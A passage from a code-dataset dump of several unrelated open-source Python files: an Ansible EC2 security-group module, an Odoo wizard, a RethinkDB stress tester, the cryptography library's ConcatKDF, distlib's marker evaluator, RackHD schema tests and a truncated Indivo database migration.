region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(
module,
conn_type='client',
resource='ec2',
region=region,
endpoint=ec2_url,
**aws_connect_params
)
else:
module.fail_json(msg="region must be specified")
# Replace filter key underscores with dashes, for compatibility, except if we're dealing with tags
sanitized_filters = module.params.get("filters")
for key in sanitized_filters:
if not key.startswith("tag:"):
sanitized_filters[key.replace("_", "-")] = sanitized_filters.pop(key)
try:
security_groups = connection.describe_security_groups(
Filters=ansible_dict_to_boto3_filter_list(sanitized_filters)
)
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(e))
# Turn the boto3 result in to ansible_friendly_snaked_names
snaked_security_groups = []
for security_group in security_groups['SecurityGroups']:
snaked_security_groups.append(camel_dict_to_snake_dict(security_group))
# Turn the boto3 result in to ansible friendly tag dictionary
for security_group in snaked_security_groups:
if 'tags' in security_group:
security_group['tags'] = boto3_tag_list_to_ansible_dict(security_group['tags'])
module.exit_json(security_groups=snaked_security_groups)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
sodexis/odoo | addons/account_analytic_plans/wizard/analytic_plan_create_model.py | 384 | 2829 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class analytic_plan_create_model(osv.osv_memory):
_name = "analytic.plan.create.model"
_description = "analytic.plan.create.model"
def activate(self, cr, uid, ids, context=None):
plan_obj = self.pool.get('account.analytic.plan.instance')
mod_obj = self.pool.get('ir.model.data')
anlytic_plan_obj = self.pool.get('account.analytic.plan')
if context is None:
context = {}
if 'active_id' in context and context['active_id']:
plan = plan_obj.browse(cr, uid, context['active_id'], context=context)
if (not plan.name) or (not plan.code):
raise osv.except_osv(_('Error!'), _('Please put a name and a code before saving the model.'))
pids = anlytic_plan_obj.search(cr, uid, [], context=context)
if not pids:
raise osv.except_osv(_('Error!'), _('There is no analytic plan defined.'))
plan_obj.write(cr, uid, [context['active_id']], {'plan_id':pids[0]}, context=context)
model_data_ids = mod_obj.search(cr, uid, [('model', '=', 'ir.ui.view'),('name', '=', 'view_analytic_plan_create_model')], context=context)
resource_id = mod_obj.read(cr, uid, model_data_ids, fields=['res_id'], context=context)[0]['res_id']
return {
'name': _('Distribution Model Saved'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'analytic.plan.create.model',
'views': [(resource_id,'form')],
'type': 'ir.actions.act_window',
'target': 'new',
}
else:
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
isidorn/test2 | test/rdb_workloads/stress.py | 1 | 12326 | #!/usr/bin/python
import sys, os, time, signal, random, string, subprocess
from tempfile import NamedTemporaryFile
from optparse import OptionParser
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'drivers', 'python')))
import rethinkdb as r
client_script = os.path.join(os.path.dirname(__file__), "stress_client.py")
parser = OptionParser()
parser.add_option("--table", dest="db_table", metavar="DB.TABLE", default="", type="string")
parser.add_option("--timeout", dest="timeout", metavar="SECONDS", default=60, type="int")
parser.add_option("--clients", dest="clients", metavar="CLIENTS", default=64, type="int")
parser.add_option("--batch-size", dest="batch_size", metavar="BATCH_SIZE", default=100, type="int")
parser.add_option("--value-size", dest="value_size", metavar="VALUE_SIZE", default=4, type="int")
parser.add_option("--workload", dest="workload", metavar="WRITES/DELETES/READS/SINDEX_READS/UPDATES/NON_ATOMIC_UPDATES", default="3/2/5/0/1/1", type="string")
parser.add_option("--host", dest="hosts", metavar="HOST:PORT", action="append", default=[], type="string")
parser.add_option("--add-sindex", dest="sindexes", metavar="constant | simple | complex | long", action="append", default=[], type="string")
(options, args) = parser.parse_args()
if len(args) != 0:
raise RuntimeError("No positional arguments supported")
# Parse out host/port pairs
hosts = [ ]
for host_port in options.hosts:
(host, port) = host_port.split(":")
hosts.append((host, int(port)))
if len(hosts) == 0:
raise RuntimeError("No rethinkdb host specified")
# Parse out and verify secondary indexes
sindexes = [ ]
for sindex in options.sindexes:
if sindex not in ["constant", "simple", "complex", "long"]:
raise RuntimeError("sindex type not recognized: " + sindex)
sindexes.append(sindex)
# Parse out workload info - probably an easier way to do this
workload = { }
workload_defaults = [("--writes", 3),
("--deletes", 2),
("--reads", 5),
("--sindex-reads", 0),
("--updates", 1),
("--non-atomic-updates", 1)]
workload_types = [item[0] for item in workload_defaults]
workload_values = options.workload.split("/")
if len(workload_values) > len(workload_types):
raise RuntimeError("Too many workload values specified")
workload_values.extend([0 for i in range(len(workload_types) - len(workload_values))])
for op, value in zip(workload_types, workload_values):
workload[op] = str(value)
for op, value in workload_defaults:
if op not in workload.keys():
workload[op] = str(value)
clients = [ ]
output_files = [ ]
def collect_and_print_results():
global output_files
# Read in each file so that we have a per-client array containing a
# dict of timestamps to dicts of op-names: op-counts
# Format is "<time>[,<op_type>,<op_count>,<op_errs>,<avg_duration>]...
results_per_client = [ ]
errors = { }
for f in output_files:
file_data = { }
for line in f:
split_line = line.strip().split(",")
op_counts = { }
op_durations = { }
if split_line[0] == "ERROR":
key = split_line[1].strip()
errors[key] = errors.get(key, 0) + 1
else:
timestamp = float(split_line[0])
for (op_name, op_count, err_count, avg_dur) in zip(split_line[1::4], split_line[2::4], split_line[3::4], split_line[4::4]):
op_counts[op_name] = (int(op_count), int(err_count))
op_durations[op_name] = int(float(avg_dur) * 1000)
file_data[timestamp] = op_counts
results_per_client.append(file_data)
# Until we do some real analysis on the results, just get ops/sec for each client
total_per_client = [ ]
averages = [ ]
durations = [ ]
ignored_results = 0
for results in results_per_client:
if len(results) < 2:
ignored_results += 1
else:
keys = sorted(results.keys())
duration = keys[-1] - keys[0]
accumulator = { }
for (timestamp, counts) in results.items():
accumulator = dict((op, map(sum, zip(accumulator.get(op, (0, 0)), counts.get(op, (0, 0))))) for op in set(accumulator) | set(counts))
total_per_client.append(accumulator)
averages.append(dict((op, accumulator.get(op, (0, 0))[0] / (duration)) for op in accumulator.keys()))
durations.append(duration)
if ignored_results > 0:
print "Ignored %d client results due to insufficient data" % ignored_results
# Get the total number of ops of each type
total_op_counts = { }
for client_data in total_per_client:
total_op_counts = dict((op, map(sum, zip(total_op_counts.get(op, (0, 0)), client_data.get(op, (0, 0))))) for op in set(client_data) | set(total_op_counts))
# Add up all the client averages for the total ops/sec
total = { }
min_ops_per_sec = { }
max_ops_per_sec = { }
for average in averages:
total = dict((op, total.get(op, 0) + average.get(op, 0)) for op in set(total) | set(average))
# Get the lowest and highest per-client ops/sec
min_ops_per_sec = dict((op, min(min_ops_per_sec.get(op, 10000000), average.get(op))) for op in set(min_ops_per_sec) | set(average))
max_ops_per_sec = dict((op, max(max_ops_per_sec.get(op, 0), average.get(op))) for op in set(max_ops_per_sec) | set(average))
if len(durations) < 1:
print "Not enough data for results"
else:
print "Duration: " + str(int(max(durations))) + " seconds"
print "\nOperations data: "
table = [["op type", "successes", "per sec min", "per sec max", "per sec total", "errors", "avg duration"]]
for op in total.keys():
table.append([op, str(total_op_counts[op][0]), str(int(min_ops_per_sec[op])), str(int(max_ops_per_sec[op])), str(int(total[op])), str(total_op_counts[op][1]), "-"])
column_widths = []
for i in range(len(table[0])):
column_widths.append(max([len(row[i]) + 2 for row in table]))
format_str = ("{:<%d}" + ("{:>%d}" * (len(column_widths) - 1))) % tuple(column_widths)
for row in table:
print format_str.format(*row)
if len(errors) != 0:
print "\nErrors encountered:"
for error in errors:
print "%s: %s" % (error, errors[error])
def finish_stress():
global clients
print "Stopping client processes..."
[client.send_signal(signal.SIGINT) for client in clients if client.poll() is None]
# Wait up to 5s for clients to exit
end_time = time.time() + 5
while len(clients) > 0 and time.time() < end_time:
time.sleep(0.1)
clients = [client for client in clients if client.poll() is None]
# Kill any remaining clients
[client.terminate() for client in clients]
collect_and_print_results()
def interrupt_handler(signal, frame):
print "Interrupted"
finish_stress()
exit(0)
def complex_sindex_fn(row, db, table):
return r.expr([row["value"]]).concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.reduce(lambda acc, val: acc + val, 0)
return 1
def long_sindex_fn(row):
result = []
for i in range(32):
denom = 2 ** i
result.insert(0, r.branch(((row["value"] / denom) % 2) == 0, "zero", "one"))
return result
def initialize_sindexes(sindexes, connection, db, table):
# This assumes sindexes are never deleted
# if they are and a table is loaded, there could be problems
sindex_count = len(r.db(db).table(table).index_list().run(connection))
for sindex in sindexes:
# Sindexes are named as their type of sindex (below) plus a unique number
sindex_name = sindex + str(sindex_count)
sindex_count += 1
sindex_fn = None
if sindex == "constant":
sindex_fn = lambda x: 1
elif sindex == "simple":
sindex_fn = lambda x: r.branch(x["value"] % 2 == 0, "odd", "even")
elif sindex == "complex":
sindex_fn = lambda x: complex_sindex_fn(x, db, table)
elif sindex == "long":
sindex_fn = long_sindex_fn
else:
raise RuntimeError("Unknown sindex type")
print "Adding sindex '%s'..." % sindex_name
r.db(db).table(table).index_create(sindex_name, sindex_fn).run(connection)
# Get table name, and make sure it exists on the server
if len(options.db_table) == 0:
print "Creating table..."
random.seed()
table = "stress_" + "".join(random.sample(string.letters + string.digits, 10))
db = "test"
with r.connect(hosts[0][0], hosts[0][1]) as connection:
if db not in r.db_list().run(connection):
r.db_create(db).run(connection)
while table in r.db(db).table_list().run(connection):
table = "stress_" + "".join(random.sample(string.letters + string.digits, 10))
r.db(db).table_create(table).run(connection)
initialize_sindexes(sindexes, connection, db, table)
else:
# User-specified table
if "." not in options.db_table:
raise RuntimeError("Incorrect db.table format in --table option")
(db, table) = options.db_table.split(".")
with r.connect(hosts[0][0], hosts[0][1]) as connection:
if db not in r.db_list().run(connection):
r.db_create(db).run(connection)
if table not in r.db(db).table_list().run(connection):
r.db(db).table_create(table).run(connection)
initialize_sindexes(sindexes, connection, db, table)
# TODO: load existing keys, distribute them among clients
# TODO: fill out keys so that all keys are contiguous (for use by clients) - may be tricky
# Build up arg list for client processes
client_args = [client_script]
for (op, value) in workload.items():
client_args.extend([op, value])
for sindex in sindexes:
client_args.extend(["--sindex", sindex])
client_args.extend(["--value-size", str(options.value_size)])
client_args.extend(["--batch-size", str(options.batch_size)])
client_args.extend(["--table", db + "." + table])
# Register interrupt, now that we're spawning client processes
signal.signal(signal.SIGINT, interrupt_handler)
print "Launching client processes..."
count_width = len(str(options.clients))
progress_format = "\r[%%%dd/%%%dd]" % (count_width, count_width)
done_format = "\r[%%%ds]" % (count_width * 2 + 1) % "DONE"
# Launch all the client processes
for i in range(options.clients):
print (progress_format % (i, options.clients)),
sys.stdout.flush()
output_file = NamedTemporaryFile()
host, port = hosts[i % len(hosts)]
current_args = list(client_args)
current_args.extend(["--host", host + ":" + str(port)])
current_args.extend(["--output", output_file.name])
client = subprocess.Popen(current_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
clients.append(client)
output_files.append(output_file)
print done_format
print "Waiting for clients to connect..."
for i in range(options.clients):
print (progress_format % (i, options.clients)),
sys.stdout.flush()
if clients[i].stdout.readline().strip() != "ready":
raise RuntimeError("unexpected client output")
print done_format
print "Running traffic..."
for client in clients:
client.stdin.write("go\n")
client.stdin.flush()
# Wait for timeout or interrupt
end_time = time.time() + options.timeout
while time.time() < end_time:
time.sleep(1)
# Check to see if all the clients have exited (perhaps due to the cluster going down)
if not any([client.poll() == None for client in clients]):
print "All clients have exited prematurely"
break
finish_stress()
| agpl-3.0 |
zlsun/XX-Net | code/default/python27/1.0/lib/win32/cryptography/hazmat/primitives/kdf/concatkdf.py | 58 | 4109 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
from cryptography import utils
from cryptography.exceptions import (
AlreadyFinalized, InvalidKey, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.backends.interfaces import HashBackend
from cryptography.hazmat.primitives import constant_time, hashes, hmac
from cryptography.hazmat.primitives.kdf import KeyDerivationFunction
def _int_to_u32be(n):
return struct.pack('>I', n)
def _common_args_checks(algorithm, length, otherinfo):
max_length = algorithm.digest_size * (2 ** 32 - 1)
if length > max_length:
raise ValueError(
"Can not derive keys larger than {0} bits.".format(
max_length
))
if not (otherinfo is None or isinstance(otherinfo, bytes)):
raise TypeError("otherinfo must be bytes.")
def _concatkdf_derive(key_material, length, auxfn, otherinfo):
if not isinstance(key_material, bytes):
raise TypeError("key_material must be bytes.")
output = [b""]
outlen = 0
counter = 1
while (length > outlen):
h = auxfn()
h.update(_int_to_u32be(counter))
h.update(key_material)
h.update(otherinfo)
output.append(h.finalize())
outlen += len(output[-1])
counter += 1
return b"".join(output)[:length]
@utils.register_interface(KeyDerivationFunction)
class ConcatKDFHash(object):
def __init__(self, algorithm, length, otherinfo, backend):
_common_args_checks(algorithm, length, otherinfo)
self._algorithm = algorithm
self._length = length
self._otherinfo = otherinfo
if self._otherinfo is None:
self._otherinfo = b""
if not isinstance(backend, HashBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HashBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
self._backend = backend
self._used = False
def _hash(self):
return hashes.Hash(self._algorithm, self._backend)
def derive(self, key_material):
if self._used:
raise AlreadyFinalized
self._used = True
return _concatkdf_derive(key_material, self._length,
self._hash, self._otherinfo)
def verify(self, key_material, expected_key):
if not constant_time.bytes_eq(self.derive(key_material), expected_key):
raise InvalidKey
@utils.register_interface(KeyDerivationFunction)
class ConcatKDFHMAC(object):
def __init__(self, algorithm, length, salt, otherinfo, backend):
_common_args_checks(algorithm, length, otherinfo)
self._algorithm = algorithm
self._length = length
self._otherinfo = otherinfo
if self._otherinfo is None:
self._otherinfo = b""
if not (salt is None or isinstance(salt, bytes)):
raise TypeError("salt must be bytes.")
if salt is None:
salt = b"\x00" * algorithm.block_size
self._salt = salt
if not isinstance(backend, HMACBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HMACBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
self._backend = backend
self._used = False
def _hmac(self):
return hmac.HMAC(self._salt, self._algorithm, self._backend)
def derive(self, key_material):
if self._used:
raise AlreadyFinalized
self._used = True
return _concatkdf_derive(key_material, self._length,
self._hmac, self._otherinfo)
def verify(self, key_material, expected_key):
if not constant_time.bytes_eq(self.derive(key_material), expected_key):
raise InvalidKey
| bsd-2-clause |
Jeff-Tian/mybnb | Python27/Lib/site-packages/pip/_vendor/distlib/markers.py | 1261 | 6282 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Parser for the environment markers micro-language defined in PEP 345."""
import ast
import os
import sys
import platform
from .compat import python_implementation, string_types
from .util import in_venv
__all__ = ['interpret']
class Evaluator(object):
"""
A limited evaluator for Python expressions.
"""
operators = {
'eq': lambda x, y: x == y,
'gt': lambda x, y: x > y,
'gte': lambda x, y: x >= y,
'in': lambda x, y: x in y,
'lt': lambda x, y: x < y,
'lte': lambda x, y: x <= y,
'not': lambda x: not x,
'noteq': lambda x, y: x != y,
'notin': lambda x, y: x not in y,
}
allowed_values = {
'sys_platform': sys.platform,
'python_version': '%s.%s' % sys.version_info[:2],
# parsing sys.platform is not reliable, but there is no other
# way to get e.g. 2.7.2+, and the PEP is defined with sys.version
'python_full_version': sys.version.split(' ', 1)[0],
'os_name': os.name,
'platform_in_venv': str(in_venv()),
'platform_release': platform.release(),
'platform_version': platform.version(),
'platform_machine': platform.machine(),
'platform_python_implementation': python_implementation(),
}
def __init__(self, context=None):
"""
Initialise an instance.
:param context: If specified, names are looked up in this mapping.
"""
self.context = context or {}
self.source = None
def get_fragment(self, offset):
"""
Get the part of the source which is causing a problem.
"""
fragment_len = 10
s = '%r' % (self.source[offset:offset + fragment_len])
if offset + fragment_len < len(self.source):
s += '...'
return s
def get_handler(self, node_type):
"""
Get a handler for the specified AST node type.
"""
return getattr(self, 'do_%s' % node_type, None)
def evaluate(self, node, filename=None):
"""
Evaluate a source string or node, using ``filename`` when
displaying errors.
"""
if isinstance(node, string_types):
self.source = node
kwargs = {'mode': 'eval'}
if filename:
kwargs['filename'] = filename
try:
node = ast.parse(node, **kwargs)
except SyntaxError as e:
s = self.get_fragment(e.offset)
raise SyntaxError('syntax error %s' % s)
node_type = node.__class__.__name__.lower()
handler = self.get_handler(node_type)
if handler is None:
if self.source is None:
s = '(source not available)'
else:
s = self.get_fragment(node.col_offset)
raise SyntaxError("don't know how to evaluate %r %s" % (
node_type, s))
return handler(node)
def get_attr_key(self, node):
assert isinstance(node, ast.Attribute), 'attribute node expected'
return '%s.%s' % (node.value.id, node.attr)
def do_attribute(self, node):
if not isinstance(node.value, ast.Name):
valid = False
else:
key = self.get_attr_key(node)
valid = key in self.context or key in self.allowed_values
if not valid:
raise SyntaxError('invalid expression: %s' % key)
if key in self.context:
result = self.context[key]
else:
result = self.allowed_values[key]
return result
def do_boolop(self, node):
result = self.evaluate(node.values[0])
is_or = node.op.__class__ is ast.Or
is_and = node.op.__class__ is ast.And
assert is_or or is_and
if (is_and and result) or (is_or and not result):
for n in node.values[1:]:
result = self.evaluate(n)
if (is_or and result) or (is_and and not result):
break
return result
def do_compare(self, node):
def sanity_check(lhsnode, rhsnode):
valid = True
if isinstance(lhsnode, ast.Str) and isinstance(rhsnode, ast.Str):
valid = False
#elif (isinstance(lhsnode, ast.Attribute)
# and isinstance(rhsnode, ast.Attribute)):
# klhs = self.get_attr_key(lhsnode)
# krhs = self.get_attr_key(rhsnode)
# valid = klhs != krhs
if not valid:
s = self.get_fragment(node.col_offset)
raise SyntaxError('Invalid comparison: %s' % s)
lhsnode = node.left
lhs = self.evaluate(lhsnode)
result = True
for op, rhsnode in zip(node.ops, node.comparators):
sanity_check(lhsnode, rhsnode)
op = op.__class__.__name__.lower()
if op not in self.operators:
raise SyntaxError('unsupported operation: %r' % op)
rhs = self.evaluate(rhsnode)
result = self.operators[op](lhs, rhs)
if not result:
break
lhs = rhs
lhsnode = rhsnode
return result
def do_expression(self, node):
return self.evaluate(node.body)
def do_name(self, node):
valid = False
if node.id in self.context:
valid = True
result = self.context[node.id]
elif node.id in self.allowed_values:
valid = True
result = self.allowed_values[node.id]
if not valid:
raise SyntaxError('invalid expression: %s' % node.id)
return result
def do_str(self, node):
return node.s
def interpret(marker, execution_context=None):
"""
Interpret a marker and return a result depending on environment.
:param marker: The marker to interpret.
:type marker: str
:param execution_context: The context used for name lookup.
:type execution_context: mapping
"""
return Evaluator(execution_context).evaluate(marker.strip())
| apache-2.0 |
RackHD-Mirror/RackHD | test/tests/api/v2_0/schema_tests.py | 16 | 2321 | from config.api2_0_config import *
from modules.logger import Log
from on_http_api2_0 import ApiApi as api20
from on_http_api2_0 import rest
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import test
from json import loads,dumps
LOG = Log(__name__)
@test(groups=['schemas_api2.tests'])
class SchemaTests(object):
def __init__(self):
self.__client = config.api_client
self.__schemaList = None
def __get_data(self):
return loads(self.__client.last_response.data)
@test(groups=['2.0.list_schemas'])
def test_list_schemas(self):
""" Testing GET /api/2.0/schemas """
api20().schemas_get()
schemas = self.__get_data()
LOG.debug(schemas,json=True)
assert_not_equal(0, len(schemas), message='Schema list was empty')
self.__schemaList = schemas
@test(groups=['2.0.get_schema'], depends_on_groups=['2.0.list_schemas'])
def test_get_schema(self):
""" Testing GET /api/2.0/schemas/{identifier} """
assert_not_equal(None, self.__schemaList)
for member in self.__schemaList:
assert_not_equal(None,member)
dataId = member.split('/api/2.0/schemas/')[1]
api20().schemas_id_get(dataId)
schema_ref = self.__get_data()
LOG.debug(schema_ref,json=True)
id = schema_ref.get('title')
assert_true('title' in schema_ref.keys(), message='title not found in schema')
assert_true('definitions' in schema_ref.keys(), message='definitions not found in schema')
@test(groups=['2.0.get_schema_invalid'], depends_on_groups=['2.0.list_schemas'])
def test_get_schema_invalid(self):
""" Testing GET /api/2.0/schemas/{identifier} 404s properly """
assert_not_equal(None, self.__schemaList)
for member in self.__schemaList:
assert_not_equal(None,member)
try:
api20().schemas_id_get(member + '-invalid')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
break
| apache-2.0 |
sayan801/indivo_server | indivo/migrations/0016_auto__del_field_document_type.py | 3 | 52062 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Document.type'
db.delete_column('indivo_document', 'type_id')
def backwards(self, orm):
# Adding field 'Document.type'
db.add_column('indivo_document', 'type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['indivo.DocumentSchema'], null=True), keep_default=False)
models = {
'indivo.accesstoken': {
'Meta': {'object_name': 'AccessToken', '_ormbases': ['indivo.Principal']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHAShare']"}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.account': {
'Meta': {'object_name': 'Account', '_ormbases': ['indivo.Principal']},
'account': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'contact_email': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'failed_login_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'last_failed_login_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_login_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_state_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'primary_secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'secondary_secret': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'uninitialized'", 'max_length': '50'}),
'total_login_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'indivo.accountauthsystem': {
'Meta': {'unique_together': "(('auth_system', 'account'), ('auth_system', 'username'))", 'object_name': 'AccountAuthSystem'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_systems'", 'to': "orm['indivo.Account']"}),
'auth_parameters': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'auth_system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.AuthSystem']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'accountauthsystem_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'user_attributes': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'indivo.accountfullshare': {
'Meta': {'unique_together': "(('record', 'with_account'),)", 'object_name': 'AccountFullShare'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'accountfullshare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fullshares'", 'to': "orm['indivo.Record']"}),
'role_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'with_account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fullshares_to'", 'to': "orm['indivo.Account']"})
},
'indivo.allergy': {
'Meta': {'object_name': 'Allergy', '_ormbases': ['indivo.Fact']},
'allergen_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'allergen_name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'date_diagnosed': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'diagnosed_by': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'reaction': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'specifics': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'indivo.audit': {
'Meta': {'object_name': 'Audit'},
'carenet_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {}),
'document_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'effective_principal_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'pha_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'proxied_by_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'record_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'req_domain': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'req_headers': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'req_ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True'}),
'req_method': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'req_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'request_successful': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'resp_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'resp_headers': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'view_func': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'indivo.authsystem': {
'Meta': {'object_name': 'AuthSystem'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'authsystem_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'internal_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'indivo.carenet': {
'Meta': {'unique_together': "(('name', 'record'),)", 'object_name': 'Carenet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenet_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']"})
},
'indivo.carenetaccount': {
